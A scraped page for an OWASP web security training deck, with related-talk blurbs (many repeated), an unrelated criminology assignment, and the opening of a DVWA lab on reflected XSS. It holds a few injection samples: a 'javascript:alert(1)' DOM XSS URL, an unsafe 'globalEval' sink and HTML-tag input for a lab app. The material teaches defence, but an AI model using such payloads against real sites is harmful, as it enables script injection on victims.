A free application security class delivered by world renowned experts: Eoin Keary and Jim Manico.
This class has been delivered to over 1000 people in 2014 alone.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
Is your mobile app as secure as you think?Matt Lacey
Slides from talks at DunDDD and NDCLondon.
News stories of security vulnerabilities in mobile apps are becoming more common and their impact risks affecting more and more business and consumers. It doesn't have to be this way.
There are solutions to all the common security issues in mobile but sometimes we need to be made aware of what the issues are and how they can be prevented.
That's what I'll show in this talk. I'll draw on more than twelve years personal experience building apps for a wide variety of industries and the accumulated knowledge of the OWASP Mobile Security. We'll look at some examples of the common security mistakes apps on iOS, Android and Windows have made and then show practical examples of how to address the issues.
You'll leave this session wanting to review the security of your mobile apps but armed with the knowledge to make improvements and fix some security holes.
Top Ten Proactive Web Security Controls v5Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
Is your mobile app as secure as you think?Matt Lacey
Slides from talks at DunDDD and NDCLondon.
News stories of security vulnerabilities in mobile apps are becoming more common and their impact risks affecting more and more business and consumers. It doesn't have to be this way.
There are solutions to all the common security issues in mobile but sometimes we need to be made aware of what the issues are and how they can be prevented.
That's what I'll show in this talk. I'll draw on more than twelve years personal experience building apps for a wide variety of industries and the accumulated knowledge of the OWASP Mobile Security. We'll look at some examples of the common security mistakes apps on iOS, Android and Windows have made and then show practical examples of how to address the issues.
You'll leave this session wanting to review the security of your mobile apps but armed with the knowledge to make improvements and fix some security holes.
Top Ten Proactive Web Security Controls v5Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
A practical OWASP Testing Guide walk-through focused on passive and semi passive web app testing techniques
NOTE: Use the "Download" option at the top to see the presentation as a PDF properly
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
Is my web application exposed? We will present a short guide for the "contemporary developer" of web apps: we will survey the critical points of our web apps, the database, session stealing, cookies. We will then review the most common attacks from DOS to XSS to CSRF and ways to defend and / or limit damages.
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
The OWASP Top 10 is the standard first reference we give web developers who are interested in making their applications more secure. It is also the categorization scheme we give to web vulnerabilities on our security assessment reports. And finally, and perhaps most frighteningly, it is the most common framework used by organizations for securing their web applications. But what if there was more to web application security than the OWASP Top 10? In this talk, we will discuss vulnerabilities that don't fit into the OWASP Top 10 categories, but are just as dangerous if present in a web application. Developers and pentesters will benefit from this talk, as both exploits and mitigations will be covered for each of the vulnerabilities.
Attacking and Defending Mobile ApplicationsJerod Brennen
The rapid increase in mobile technology adoption in the workplace has resulted in a rise in mobile application attacks. This presentation provides attendees with insight into how mobile application attacks are perpetuated, as well as how we can develop to defend against them.
Advanced Information Gathering AKA Google HackingGareth Davies
A talk I gave at Hack in the Box (HITB) 2004 about Information Gathering AKA Google Hacking and more.
The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.
Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.
Web security track - opening talk:
OWASP & OWASP Switzerland
Swiss Cyber Storm 3 (Rapperswil, May 2011)
Original powerpoint slides can be downloaded and re-used under following conditions:
- you're free to copy, distribute and transmit the work
- you're free to adapt the work
- if you alter, transform, or build upon this work, you may distribute the resulting work under the same or similar rights to this one
Rebooting Software Development - OWASP AppSecUSA Nick Galbreath
If we are ever going to get ahead of the whack-a-mole security vulnerability game, we, as security professionals need to start getting involved more in the development of software. Let's review the origins of the traditional software development, and what assumptions are made. Then we'll review if those assumptions still hold for modern web applications, and what problems they cause, especially for security. Continuous deployment helps address these problems and allows for faster, more secure development. It's more than just "pushing code a lot", when done correctly it can be transformative to the organization. We'll discuss what continuous deployment is, how to get started, and what components are needed to make it successful, and secure.
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
A practical OWASP Testing Guide walk-through focused on passive and semi passive web app testing techniques
NOTE: Use the "Download" option at the top to see the presentation as a PDF properly
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
Is my web application exposed? We will present a short guide for the "contemporary developer" of web apps: we will survey the critical points of our web apps, the database, session stealing, cookies. We will then review the most common attacks from DOS to XSS to CSRF and ways to defend and / or limit damages.
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
The OWASP Top 10 is the standard first reference we give web developers who are interested in making their applications more secure. It is also the categorization scheme we give to web vulnerabilities on our security assessment reports. And finally, and perhaps most frighteningly, it is the most common framework used by organizations for securing their web applications. But what if there was more to web application security than the OWASP Top 10? In this talk, we will discuss vulnerabilities that don't fit into the OWASP Top 10 categories, but are just as dangerous if present in a web application. Developers and pentesters will benefit from this talk, as both exploits and mitigations will be covered for each of the vulnerabilities.
Attacking and Defending Mobile ApplicationsJerod Brennen
The rapid increase in mobile technology adoption in the workplace has resulted in a rise in mobile application attacks. This presentation provides attendees with insight into how mobile application attacks are perpetuated, as well as how we can develop to defend against them.
Advanced Information Gathering AKA Google HackingGareth Davies
A talk I gave at Hack in the Box (HITB) 2004 about Information Gathering AKA Google Hacking and more.
The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.
Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.
Web security track - opening talk:
OWASP & OWASP Switzerland
Swiss Cyber Storm 3 (Rapperswil, May 2011)
Original powerpoint slides can be downloaded and re-used under following conditions:
- you're free to copy, distribute and transmit the work
- you're free to adapt the work
- if you alter, transform, or build upon this work, you may distribute the resulting work under the same or similar rights to this one
Rebooting Software Development - OWASP AppSecUSA Nick Galbreath
If we are ever going to get ahead of the whack-a-mole security vulnerability game, we, as security professionals need to start getting involved more in the development of software. Let's review the origins of the traditional software development, and what assumptions are made. Then we'll review if those assumptions still hold for modern web applications, and what problems they cause, especially for security. Continuous deployment helps address these problems and allows for faster, more secure development. It's more than just "pushing code a lot", when done correctly it can be transformative to the organization. We'll discuss what continuous deployment is, how to get started, and what components are needed to make it successful, and secure.
Most software developers have heard about OWASP Top Ten, describing the 10 most critical security vulnerabilities that should be avoided in web applications.
However, in order to prevent them, developers must be aware of the proactive controls that should be incorporated from early stages of software development lifecycle.
This talk briefly discusses the OWASP Top Ten Proactive Controls and then maps them to the respective OWASP Vulnerabilities that each of them addresses.
Update on progress of the 4 OWASP OWTF GSoC 2013 projects, with an intro overview about OWTF and some examples on how the OWASP Testing Guide is being covered at the moment towards the end.
This webcast's agenda is:
1. Introduction to the OWASP Top TEN.
2. How to integrate the OWASP Top Ten in your SDLC.
3. How the OWASP Top Ten maps to compliance, standards and other drivers.
OWASP WTE, or OWASP Web Testing Environment, is a collection of application security tools and documentation available in multiple formats such as VMs, Linux distribution packages, Cloud-based installations and ISO images.
This presentation provides an overview and history of OWASP WTE. Additionally, it shows new OWASP WTE developments including the the ability to use WTE remotely by installing it on a cloud-based server.
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
The OWASP Top 10 provides a list of the 10 most critical web application security risks. How do these relate to AngularJS applications? What security vulnerabilities should developers be aware of beyond XSS and CSRF?
This session will review the OWASP Top 10 with a front-end development focus on HTML and JavaScript. It will look at patterns to implement and others to consider avoiding. We will also explore several built-in features of AngularJS that help secure your application.
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
How to get along with HATEOAS without letting the bad guys steal your lunch?
It’s a cool idea - decouple the client from the server and let the application tell the client what it can do dynamically. This approach should allow much more flexibility and resilience as the client and server can evolve separately. Unfortunately, the HATEOAS approach can be a free lunch for cybercriminals unless you understand the simple steps needed to secure your design.
The question is - how to achieve the balance of design flexibility and security in practice?
This session will show you how to create a secure hypermedia-driven RESTful web service using HATEOAS principles. You’ll learn how HATEOAS works, understand how it can be exploited by the bad guys and discover why HATEOAS is still a really good approach .
With code and examples this session will leave you more informed and possibly a little wiser.
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
With new tools like Angular.js and Node.js, it is easier than ever to build User Interfaces and Single-Page Applications (SPAs) backed by APIs.
But how to do it securely? Web browsers are woefully insecure, and hand-rolled APIs are risky.
In this presentation, Robert Damphousse, lead front-end developer at Stormpath, covers web browser security issues, technical best practices and how you can mitigate potential risks. Enjoy!
Topics Covered:
1. Security Concerns for Modern Web Apps
2. Cookies, The Right Way
3. Session ID Problems
4. Token Authentication to the rescue!
5. Angular Examples
Continuing in your role as a human service provider for your local.docxrichardnorman90310
Continuing in your role as a human service provider for your local community, your manager has asked you to write an opinion piece for the local newspaper discussing gaps in prison and jail services in their state.
Write an opinion article that is 900 words. Complete the following in your article:
· Describe the major beliefs of 4 criminological theories.
· For each criminological theory, explain what human services should be provided to inmates.
· Of the services identified for each criminological theory, list the services that are not currently provided by your local or state agencies.
· Discuss your personal beliefs related to which human services should be provided by your local or state agencies.
· Discuss a conclusion focused on changes in human services you would like to see made by your local or state agencies.
Lab-8: Web Hacking
Websites have always been among the first targets of hackers. There are many reasons for this. These are the most important ones:
1) Websites have to be reachable from the Internet. Their primary purpose is to publish something or provide some service for the public
2) There are more than 1 billion websites as almost every organization, and many individuals have websites
3) As opposed to the earlier years of the world wide web, websites are very dynamic today. They come with forms and dynamic applications implemented by many different frontend and backend technologies. A wide variety of dynamic applications not only bring more functionality to web applications but also introduces vulnerabilities.
As a result, we are talking about something valuable that is billions in amount, accessible by anybody, and a commonplace for wrong implementation and vulnerabilities.Section-1: Exploit Cross-Site Scripting (XSS) Vulnerability
An XSS attack enables malicious users to inject client-side scripts such as JavaScript codes into web pages viewed by other users. The term XSS is used to describe both the vulnerability and the attack type, such as XSS attack / XSS vulnerability on the web application.
1) Log into Windows 7 Attacker on the Netlab environment.
2) Open Firefox by clicking the icon on the desktop or start menu
3) Visit this page
http://192.168.2.15/dvwa/login.php
This is the "Damn Vulnerable Web Application" hosted on the OWASP BWA machine on Netlab.
4)
Log in to web application by typing
user as Username and
user as Password. After logging in, you will see the page below.
5) Click on the XSS reflected on the left menu and type your nickname into the textbook at the right pane of the webpage. (I typed "ethical" and clicked the submit button. The web application gets what you typed as the input, add Hello to the beginning, and prints to the screen.
6)
Try some basic HTML tags now. Type
<h1>your nickname</h1>
I typed "<h1>ethical</h1> and then clicked submit button. I confirm .
Similar to OWASP Free Training - SF2014 - Keary and Manico (20)
The 2023 Vulnerability Stats report as delivered to the IISF.
Covering: PTaaS, Pentesting, Vulnerabilty Managment, EPSS, CISA KEV, Risk, Attack Surface Management. Its based on delivering thousands of PTaaS and RBVM assessments throughout 2022. Why tools and traditional pentesting has failed.
How to approach validation of vulnerbilities for scale penetration testing. DEpth, accuracy and scale are a triad of problems each requiring attention. Attackers and threat actors have more time and patieince to look for complex vulnerabilities. Automation reliance is not working and will not beat determined humans.
Does a Hybrid model for vulnerability Management Make Sense.pdfEoin Keary
Combining automation for scale and human expertise for depth. Leveraging thousands of datapoints and cyber analytics to verify security vulnerabilities. Why automation alone does not work because our enemies are humans. Automation does not have the skills to exploit business logic risks. Context is queen when it comes to risk bases priortization.
Vulnerability stats, full stack cyber issues.
Vulnerability management, threat analysis and attack surface management. Exposures, MTTR and cyber risk management.
Bested in the assessment of thousands of systems globally on a continuous basis.
A deck discussing the the findings from the Edgescan 2021 Vulnerability Stats Report. A full stack view of the vulnerabilities discovered in 2020 based on thousands of assessments. Host, network and application layer security metrics -Full stack
The 2018 Vulnerability Stats report covering off a fullstack review of cyber security across 1000's of web applictions, end-points and cloud based systems globally.
Hide and seek - Attack Surface Management and continuous assessment.Eoin Keary
Attack surface management and visibility is key to maintaining a robust cyber security posture. Continuous assessment, accuracy and scale are key to enterprise security.
Discussion on how to deliver vulnerability management at scale.
Why Fullstack vulnerability management is important and silos of security are an issue. The pitfalls when delivering 1000's of assessments on a continuous basis. How edgescan delivers vulnerability intelligence.
Web security – everything we know is wrong cloud versionEoin Keary
A revised version for 2017 on an old OWASP talk from 2015.
Web application security, Development security challenges and how we are approaching cyber security incorrectly for years...but there is hope!!
Why continuous assessment is required. How to keep pace with development and secure constant change. Vulnerability statistics across the fullstack. What are the most common security issues in the web application and host layer.
Talk in Switzerland at European Broadcasting Union cyber security event - Feb 2017.
Discussing some core aspects of secure application development, technical security controls and secure systems development lifecycle....
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
2. The OWASP Foundation
http://www.owasp.org
Eoin Keary
CTO BCC Risk Advisory / edgescan.com
OWASP GLOBAL BOARD MEMBER
Michael Coates
Director Shape Security
OWASP GLOBAL BOARD MEMBER
Jim Manico
OWASP GLOBAL BOARD MEMBER
OWASP Cheat-Sheet Project Lead
3. The OWASP Foundation
http://www.owasp.org
The Numbers
Cyber Crime:
“Second cause of economic crime experienced by the financial
services sector” – PwC
“Globally, every second, 18 adults become victims of
cybercrime” - Norton
US - $20.7 billion – (direct losses)
Globally 2012 - $110,000,000,000 – direct losses
“556 million adults across the world have first-hand experience of cybercrime --
more than the entire population of the European Union.”
5. The OWASP Foundation
http://www.owasp.org
Pentesting?
A penetration test is a method of evaluating
computer and network security by simulating an
attack on a computer system or network from
external and internal threats.
This is a component of an overall security
assessment.
9. The OWASP Foundation
http://www.owasp.org
A traditional end of cycle / Annual pentest only
gives minimal security…..
There are too many variables and too little time to
ensure “real security”.
12. The OWASP Foundation
http://www.owasp.org
HTTP Manipulation – Scanning – Is Not Enough
Dumb tools and Smart Apps
Problem has moved (back) to the client.
Some “Client Side” vulnerabilities can’t be tested via HTTP parameter testing.
AJAX
Flex/Flash/Air
Native Mobile Web Apps – Data Storage, leakage, malware.
DOM XSS – Sinks & Sources in client script -> no HTTP required
Scanning in not enough anymore.
We need DOM security assessment.
Javascript parsing/Taint analysis/String analysis/Manual Validation
window.location = http://example.com/a/page.ext?par=val#javascript:alert(1)
jQuery.globalEval( userContent ):
http://code.google.com/p/domxsswiki/
13. The OWASP Foundation
http://www.owasp.org
Business Logic – Finite State Machines
Automated scanners are dumb
No idea of business state or state transitions
No clue about horizontal or vertical authorization / roles
No clue about business context
We test applications for security issues without knowing the business process
We cant “break” logic (in a meaningful way) we don’t understand
Running a $30,000 scanning tool against your mission critical application?
Will this find flaws in your business logic or state machine?
We need human intelligence & verification
We can’t test what we don’t
understand
14. The OWASP Foundation
http://www.owasp.org
“Onions”
SDL Design review
Threat Modeling
Code review/SAST/CI
Negative use/abuse cases/Fuzzing/DAST
Live/ Continuous/Frequent monitoring / Testing
Ongoing Manual Validation
Vulnerability management & Priority
Dependency Management ….
“Robots are good at detecting known unknowns”
“Humans are good at detecting unknown unknowns”
15. The OWASP Foundation
http://www.owasp.org
Application
Code
COTS
(Commercial off
the shelf
Outsourced
development Sub-
Contractors
Bespoke
outsourced
development
Bespoke Internal
development
Third Party
API’s
Third Party
Components
& Systems
Degrees of trust
You may not let some of the people who have developed your code into your offices!!
More LESS
16. The OWASP Foundation
http://www.owasp.org
2012/13 Study of 31 popular open source
libraries
- 19.8 million (26%) of the library
downloads have known vulnerabilities
- Today's applications may use up to 30 or
more libraries - 80% of the codebase
Dependencies
17. The OWASP Foundation
http://www.owasp.org
Spring application development framework :
Downloaded 18 million times by over 43,000
organizations in the last year
– Vulnerability: Information leakage CVE-2011-2730
http://support.springsource.com/security/cve-2011-2730
In Apache CXF application framework:
4.2 million downloads.
- Vulnerability: Auth bypass CVE-2010-2076 & CVE
2012-0803
http://svn.apache.org/repos/asf/cxf/trunk/security/CVE-2010-2076.pdf
http://cxf.apache.org/cve-2012-0803.html
Dependencies
18. The OWASP Foundation
http://www.owasp.org
Do we test for "dependency" issues?
NO
Does your patch management policy cover
application dependencies?
Check out:
https://github.com/jeremylong/DependencyCheck
20. The OWASP Foundation
http://www.owasp.org
Doing things right != Doing the right things
“Not all bugs/vulnerabilities are equal”
(is HttpOnly important if there is no XSS?)
Contextualize Risk
(is XSS /SQLi always High Risk?)
Do developers need to fix everything?
• Limited time
• Finite Resources
• Task Priority
• Pass internal audit?
White Noise
Where do we go now?
Context is important!
Dick Tracy
22. The OWASP Foundation
http://www.owasp.org
Is Cross-Site Scripting the same as SQL injection?
Both are injection attacks code and data being confused by system
Cross Site Scripting is primarily JavaScript injection
LDAP Injection, Command Injection, Log Injection, XSS, SQLI etc etc
Think old phone systems, Captain Crunch (John Draper)
Signaling data and voice data on same logical connection – Phone Phreaking
23. The OWASP Foundation
http://www.owasp.org
XSS causes the browser to execute user
supplied input as code. The input breaks
out of the [data context] and becomes
[execution context].
SQLI causes the database or source
code calling the database to confuse
[data context] and ANSI SQL [ execution
context].
Command injection mixes up [data
context] and the [execution context].
Out of context
25. The OWASP Foundation
http://www.owasp.org
Web Application
Security
Host
Apps
Firewall
Host
Apps Database
Host
Web server App server DB server
Securing the application
Input validation Session mgmt Authentication
Authorization Config mgmt Error handling
Secure storage Auditing/logging
Securing the network
Router
Firewall
Switch
Securing the host
Patches/updates Accounts Ports
Services Files/directories Registry
Protocols Shares Auditing/logging
Firewall
26. The OWASP Foundation
http://www.owasp.org
HTTP is stateless and hence requests and responses to communicate
between browser and server have no memory.
Most typical HTTP requests utilise either GET or POST methods
Scripting can occur on:
Server-Side (e.g. perl, asp, jsp)
Client-Side (javascript, flash, applets)
Web server file mappings allow the web server to handle certain file
types using specific handlers (ASP, ASP.NET, Java, JSP,CFM etc)
Data is posted to the application through HTTP methods, this data is
processed by the relevant script and result returned to the user’s
browser
Web Application
Behaviour
2
6
27. The OWASP Foundation
http://www.owasp.org
HTTP POST
HTTP GET
“GET” exposes sensitive authentication information in the URL
In Web Server and Proxy Server logs
In the http referer header
In Bookmarks/Favorites often emailed to others
“POST” places information in the body of the request and not the URL
Enforce HTTPS POST For Sensitive Data Transport
2
7
28. The OWASP Foundation
http://www.owasp.org
GET vs POST HTTP Request
GET
/search.jsp?name=blah&type=1
HTTP/1.0
User-Agent: Mozilla/4.0
Host: www.mywebsite.com
Cookie:
SESSIONID=2KDSU72H9GSA289
<CRLF>
GET request POST request
POST /search.jsp HTTP/1.0
User-Agent: Mozilla/4.0
Host: www.mywebsite.com
Content-Length: 16
Cookie:
SESSIONID=2KDSU72H9GSA289
<CRLF>
name=blah&type=1
<CRLF>
29. The OWASP Foundation
http://www.owasp.org
What are HTTP
Headers?
HTTP headers are components of the message header of HTTP
Requests and Responses
HTTP headers define different aspects of an HTTP transaction
HTTP headers are colon-separated name-value pairs in clear-text
string format, terminated by a carriage return (CR) and line feed
(LF) character sequence.
http://en.wikipedia.org/wiki/List_of_HTTP_header_fields
30. The OWASP Foundation
http://www.owasp.org
Security HTTP Response
Headers
X-Frame-Options
X-Xss-Protection
X-Content-Type-Options
Content Security Policy
Access-Control-Allow-Origin
HTTPS Strict Transport Security
Cache-Control / Pragma
31. The OWASP Foundation
http://www.owasp.org
Security HTTP Response headers
X-Frame-Options 'SAMEORIGIN' - allow framing on same domain. Set it to 'DENY'
to deny framing at all or 'ALLOWALL' if you want to allow framing for all website.
X-XSS-Protection '1; mode=block' - use XSS Auditor and block page if XSS attack
is detected. Set it to '0;' if you want to switch XSS Auditor off(useful if response
contents scripts from request parameters)
X-Content-Type-Options 'nosniff’ - stops the browser from guessing the MIME
type of a file.
X-Content-Security-Policy - A powerful mechanism for controlling which sites
certain content types can be loaded from
Access-Control-Allow-Origin - used to control which sites are allowed to bypass
same origin policies and send cross-origin requests.
Strict-Transport-Security - used to control if the browser is allowed to only access
a site over a secure connection
Cache-Control - used to control mandatory content caching rules
35. The OWASP Foundation
http://www.owasp.org
Content Security Policy
• Anti-XSS W3C standard http://www.w3.org/TR/CSP/
• Move all inline script and style into external files
• Add the X-Content-Security-Policy response header to
instruct the browser that CSP is in use
• Define a policy for the site regarding loading of content
• Chrome version 25 and later (50%)
• Firefox version 23 and later (30%)
• Internet Explorer version 10 and later (10%)
36. The OWASP Foundation
http://www.owasp.org
Strict Transport Security
Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000;
includeSubdomains
42. The OWASP Foundation
http://www.owasp.org
1) Do not limit the type of characters or
length of user password within reason
• Limiting passwords to protect against injection is
doomed to failure
• Use proper encoder and other defenses
described instead
• Be wary of systems that allow unlimited
password sizes (Django DOS Sept 2013)
43. The OWASP Foundation
http://www.owasp.org
2) Use a cryptographically strong
